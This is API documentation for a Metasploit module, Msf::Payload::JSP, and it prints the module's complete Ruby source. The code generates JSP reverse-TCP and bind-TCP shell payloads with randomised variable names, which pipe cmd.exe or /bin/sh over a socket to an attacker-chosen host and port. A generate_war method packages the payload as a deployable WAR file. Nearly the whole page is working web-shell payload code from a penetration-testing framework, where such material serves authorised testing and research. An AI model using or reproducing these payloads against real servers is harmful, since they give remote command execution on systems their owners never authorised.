Module: Msf::Payload::JSP
- Defined in:
- lib/msf/core/payload/jsp.rb
Overview
This module is chained within JSP payloads that target the Java platform. It provides methods to generate Java / JSP code.
Instance Method Summary collapse
-
#generate_war ⇒ Rex::Zip::Jar
Wraps the jsp payload into a war.
- #initialize(info = {}) ⇒ Object
-
#jsp_bind_tcp ⇒ String
Outputs jsp that spawns a bind TCP shell.
-
#jsp_reverse_tcp ⇒ String
Outputs jsp code that spawns a reverse TCP shell.
-
#shell_path ⇒ String
Outputs Java code to assign the system shell path to a variable.
Instance Method Details
#generate_war ⇒ Rex::Zip::Jar
Wraps the jsp payload into a war
164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 |
# File 'lib/msf/core/payload/jsp.rb', line 164 def generate_war jsp_name = "#{Rex::Text.rand_text_alpha_lower(rand(8)+8)}.jsp" zip = Rex::Zip::Jar.new web_xml = <<-EOF <?xml version="1.0"?> <!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_3.dtd"> <web-app> <welcome-file-list> <welcome-file>#{jsp_name}</welcome-file> </welcome-file-list> </web-app> EOF zip.add_file("WEB-INF/", '') zip.add_file("WEB-INF/web.xml", web_xml) zip.add_file(jsp_name, generate) zip end |
#initialize(info = {}) ⇒ Object
9 10 11 12 13 14 15 16 17 |
# File 'lib/msf/core/payload/jsp.rb', line 9 def initialize(info = {}) ret = super(info) ([ Msf::OptString.new( 'SHELL', [false, 'The system shell to use.']) ], Msf::Payload::JSP ) ret end |
#jsp_bind_tcp ⇒ String
Outputs jsp that spawns a bind TCP shell
22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 |
# File 'lib/msf/core/payload/jsp.rb', line 22 def jsp_bind_tcp # Modified from: http://www.security.org.sg/code/jspreverse.html generator = Rex::RandomIdentifier::Generator.new({ language: :jsp }) var_is = generator.generate(2) var_os = generator.generate(2) var_in = generator.generate(2) var_out = generator.generate(3) jsp = <<-EOS <%@page import="java.lang.*"%> <%@page import="java.util.*"%> <%@page import="java.io.*"%> <%@page import="java.net.*"%> <% class StreamConnector extends Thread { InputStream #{var_is}; OutputStream #{var_os}; StreamConnector( InputStream #{var_is}, OutputStream #{var_os} ) { this.#{var_is} = #{var_is}; this.#{var_os} = #{var_os}; } public void run() { BufferedReader #{var_in} = null; BufferedWriter #{var_out} = null; try { #{var_in} = new BufferedReader( new InputStreamReader( this.#{var_is} ) ); #{var_out} = new BufferedWriter( new OutputStreamWriter( this.#{var_os} ) ); char buffer[] = new char[8192]; int length; while( ( length = #{var_in}.read( buffer, 0, buffer.length ) ) > 0 ) { #{var_out}.write( buffer, 0, length ); #{var_out}.flush(); } } catch( Exception e ){} try { if( #{var_in} != null ) #{var_in}.close(); if( #{var_out} != null ) #{var_out}.close(); } catch( Exception e ){} } } try { #{shell_path} ServerSocket server_socket = new ServerSocket( #{datastore['LPORT'].to_s} ); Socket client_socket = server_socket.accept(); server_socket.close(); Process process = Runtime.getRuntime().exec( ShellPath ); ( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start(); ( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start(); } catch( Exception e ) {} %> EOS jsp end |
#jsp_reverse_tcp ⇒ String
Outputs jsp code that spawns a reverse TCP shell
94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 |
# File 'lib/msf/core/payload/jsp.rb', line 94 def jsp_reverse_tcp # JSP Reverse Shell modified from: http://www.security.org.sg/code/jspreverse.html generator = Rex::RandomIdentifier::Generator.new({ language: :jsp }) var_is = generator.generate(2) var_os = generator.generate(2) var_in = generator.generate(2) var_out = generator.generate(3) jsp = <<-EOS <%@page import="java.lang.*"%> <%@page import="java.util.*"%> <%@page import="java.io.*"%> <%@page import="java.net.*"%> <% class StreamConnector extends Thread { InputStream #{var_is}; OutputStream #{var_os}; StreamConnector( InputStream #{var_is}, OutputStream #{var_os} ) { this.#{var_is} = #{var_is}; this.#{var_os} = #{var_os}; } public void run() { BufferedReader #{var_in} = null; BufferedWriter #{var_out} = null; try { #{var_in} = new BufferedReader( new InputStreamReader( this.#{var_is} ) ); #{var_out} = new BufferedWriter( new OutputStreamWriter( this.#{var_os} ) ); char buffer[] = new char[8192]; int length; while( ( length = #{var_in}.read( buffer, 0, buffer.length ) ) > 0 ) { #{var_out}.write( buffer, 0, length ); #{var_out}.flush(); } } catch( Exception e ){} try { if( #{var_in} != null ) #{var_in}.close(); if( #{var_out} != null ) #{var_out}.close(); } catch( Exception e ){} } } try { #{shell_path} Socket socket = new Socket( "#{datastore['LHOST']}", #{datastore['LPORT'].to_s} ); Process process = Runtime.getRuntime().exec( ShellPath ); ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); } catch( Exception e ) {} %> EOS jsp end |
#shell_path ⇒ String
Outputs Java code to assign the system shell path to a variable.
It uses the datastore if a value has been provided, otherwise tries to guess the system shell path bad on the os target.
194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 |
# File 'lib/msf/core/payload/jsp.rb', line 194 def shell_path if datastore['SHELL'] && !datastore['SHELL'].empty? jsp = "String ShellPath = \"#{datastore['SHELL']}\";" else jsp = <<-EOS String ShellPath; if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) { ShellPath = new String("/bin/sh"); } else { ShellPath = new String("cmd.exe"); } EOS end jsp end |